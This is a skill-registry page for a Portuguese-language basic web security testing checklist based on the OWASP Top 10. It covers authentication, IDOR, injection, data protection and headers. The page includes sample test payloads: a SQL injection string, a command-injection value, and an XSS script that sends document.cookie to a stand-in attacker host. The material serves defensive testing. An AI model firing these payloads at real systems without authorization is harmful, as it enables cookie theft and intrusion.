TE

teste-de-seguranca

Provides actionable security testing procedures for developers to identify common web vulnerabilities.

Install

mkdir -p .claude/skills/teste-de-seguranca && curl -L -o skill.zip "https://agentskills.codes/api/skills/download/9840" && unzip -o skill.zip -d .claude/skills/teste-de-seguranca && rm skill.zip

Installs to .claude/skills/teste-de-seguranca

Activation

This is the description your AI agent reads to decide when to run this skill — the better it matches your request, the more reliably it fires.

Guia o desenvolvedor na identificação e teste de vulnerabilidades de segurança no sistema, com foco em práticas acessíveis baseadas no OWASP Top 10. Use esta skill SEMPRE que o objetivo for verificar se o sistema está protegido contra as ameaças de segurança mais comuns. Acione quando o usuário mencionar: "teste de segurança", "security testing", "pentest básico", "vulnerabilidades", "OWASP", "SQL injection", "XSS", "cross-site scripting", "testar autenticação e autorização", "quero saber se minha API está segura", "auditoria de segurança básica", "dados dos usuários estão protegidos", "IDOR", "CORS", "injeção". Esta skill cobre o nível básico acessível a qualquer desenvolvedor — pentest profundo requer especialista em segurança ofensiva. Agnóstica de linguagem e framework.
784 charsno explicit “when” triggerlonger than Claude Code's old 250-char listing cap (fine on current versions)
Intermediate

Key capabilities

  • Authentication and authorization testing
  • Input validation for injection vulnerabilities
  • Sensitive data protection checks
  • Security header verification

How it works

The skill follows a systematic process based on the OWASP Top 10 to identify common security flaws through manual verification steps.

Inputs & outputs

You give it
API endpoints or web forms
You get back
Vulnerability report with severity levels

When to use teste-de-seguranca

  • Performing basic security audits
  • Testing input validation
  • Verifying authentication and authorization

About this skill

Teste de Segurança

O que é

O teste de segurança verifica se o sistema está protegido contra acessos não autorizados, injeção de código malicioso e exposição de dados sensíveis. Esta skill cobre o nível básico — baseado no OWASP Top 10 — que qualquer desenvolvedor pode e deve aplicar. Para testes de penetração avançados (pentest completo), é recomendada a contratação de um especialista.

Quando usar

  • Antes de lançar qualquer sistema que processa dados de usuários
  • Quando quer verificar se autenticação e autorização estão corretas
  • Quando quer testar se campos de input são vulneráveis a injeção
  • Quando quer verificar se dados sensíveis estão sendo protegidos corretamente
  • Como parte da revisão de segurança antes de deploys em produção

Quando NÃO usar

  • Como substituto para um pentest profissional em sistemas de alta criticidade (financeiro, saúde)
  • Em sistemas de produção sem autorização explícita dos responsáveis
  • Sem entender as implicações legais de testes de segurança em sistemas de terceiros

Como funciona — Processo Passo a Passo

Passo 1: Definir escopo Quais partes do sistema serão avaliadas? (API, formulários web, autenticação, banco de dados). Qual nível de profundidade? Esta skill cobre: autenticação, autorização, validação de input e proteção de dados.

Passo 2: Autenticação e autorização

  • Acessar recursos sem credenciais → deve retornar 401 (não 403, não 200)
  • Credenciais inválidas → mensagem genérica (não revela se o usuário existe — "credenciais inválidas", nunca "senha errada para este e-mail")
  • Acessar recurso de outro usuário → deve retornar 403 (IDOR — Insecure Direct Object Reference)
  • Usuário comum acessar área de administração → deve retornar 403

Passo 3: Validação de input (injeção)

  • SQL Injection: inserir ' OR '1'='1 em campos de texto que fazem queries
  • XSS (Cross-Site Scripting): inserir <script>alert('xss')</script> em campos que renderizam HTML
  • Command Injection: inserir ; ls -la em campos processados pelo servidor
  • Regra: NUNCA confiar em input do cliente — sempre validar e sanitizar no servidor

Passo 4: Proteção de dados sensíveis

  • Dados trafegam via HTTPS? (não HTTP)
  • Senhas armazenadas com hash robusto? (não texto plano, não MD5)
  • Tokens e chaves de API aparecem em logs? Em respostas de API?
  • Dados sensíveis (CPF, cartão) aparecem em URLs ou headers não criptografados?

Passo 5: Headers e configurações

  • Headers de segurança presentes? (Content-Security-Policy, X-Frame-Options, X-Content-Type-Options)
  • Versão do servidor ou framework exposta nos headers de resposta?
  • CORS configurado corretamente? (não Access-Control-Allow-Origin: * em APIs privadas)

Passo 6: Documentar vulnerabilidades Para cada vulnerabilidade: tipo, severidade (Crítica/Alta/Média/Baixa), como reproduzir, impacto e sugestão de correção.

Critérios de Qualidade

  • Autenticação, autorização E validação de input são cobertas
  • Referência ao OWASP Top 10 como guia
  • Vulnerabilidades classificadas por severidade
  • Evidência de cada vulnerabilidade documentada (steps de reprodução)
  • Limites honestos: menciona quando o escopo vai além desta skill (pentest avançado)

Exemplo Conceitual

Teste de IDOR (Insecure Direct Object Reference) em uma API de pedidos:

Cenário: usuário A tem o pedido de ID 1001. Usuário B faz a requisição GET /pedidos/1001 usando seu próprio token.

ComportamentoCorreto?
Retorna os dados do pedido 1001 (do usuário A)❌ Vulnerabilidade crítica
Retorna 403 Forbidden✅ Correto
Retorna 404 Not Found✅ Aceitável (não revela que o recurso existe)

Teste de XSS em campo de nome de usuário:

Input: <script>document.location='http://atacante.com/cookie='+document.cookie</script>

ComportamentoCorreto?
Script é executado na página❌ Vulnerabilidade crítica
Input é sanitizado e exibido como texto✅ Correto
Campo rejeita o input com mensagem de erro✅ Correto

Checklist de Conclusão

  • Testei acesso sem autenticação (deve retornar 401)?
  • Testei acesso a recursos de outro usuário (deve retornar 403 — IDOR)?
  • Testei SQL injection em campos de texto que fazem queries?
  • Testei XSS em campos que renderizam HTML?
  • Verifiquei que dados trafegam via HTTPS?
  • Verifiquei que senhas não são armazenadas em texto plano?
  • Documentei cada vulnerabilidade com severidade e steps de reprodução?

Skills Relacionadas

SkillRelaçãoQuando preferir aquela
teste-de-APIComplementar — testa o contrato HTTPQuando quer validar autenticação e contratos antes de ir para segurança
teste-de-sistemaEscopo — sistema completoQuando quer testar segurança no contexto do sistema completo, não apenas uma API

When not to use it

  • Production systems without explicit authorization
  • High-criticality systems requiring professional pentesting

Limitations

  • Limited to basic security audits
  • Not a substitute for professional penetration testing

How it compares

It provides a developer-accessible checklist approach rather than relying on automated black-box scanning tools.

Compared to similar skills

teste-de-seguranca side by side with the closest alternatives in the catalog.

SkillInstallsUpdatedSafetyDifficulty
teste-de-seguranca (this skill)03moNo flagsIntermediate
security-requirement-extraction72moNo flagsIntermediate
api-fuzzing-for-bug-bounty96moReviewAdvanced
secure-workflow-guide32moNo flagsAdvanced

Try saying

Example prompts that trigger this skill in your AI assistant.

You might also like

security-requirement-extraction

wshobson

Derive security requirements from threat models and business context. Use when translating threats into actionable requirements, creating security user stories, or building security test cases.

759

api-fuzzing-for-bug-bounty

davila7

This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.

929

secure-workflow-guide

trailofbits

Guides through Trail of Bits' 5-step secure development workflow. Runs Slither scans, checks special features (upgradeability/ERC conformance/token integration), generates visual security diagrams, helps document security properties for fuzzing/verification, and reviews manual security areas.

331

cross-site-scripting-and-html-injection-testing

davila7

This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". It provides comprehensive techniques for detecting, exploiting, and understanding XSS and HTML injection attack vectors in web applications.

322

defense-in-depth-validation

mrgoonie

Validate at every layer data passes through to make bugs impossible

319

semgrep-rule-creator

trailofbits

Creates custom Semgrep rules for detecting security vulnerabilities, bug patterns, and code patterns. Use when writing Semgrep rules or building custom static analysis detections.

416

Search skills

Search the agent skills registry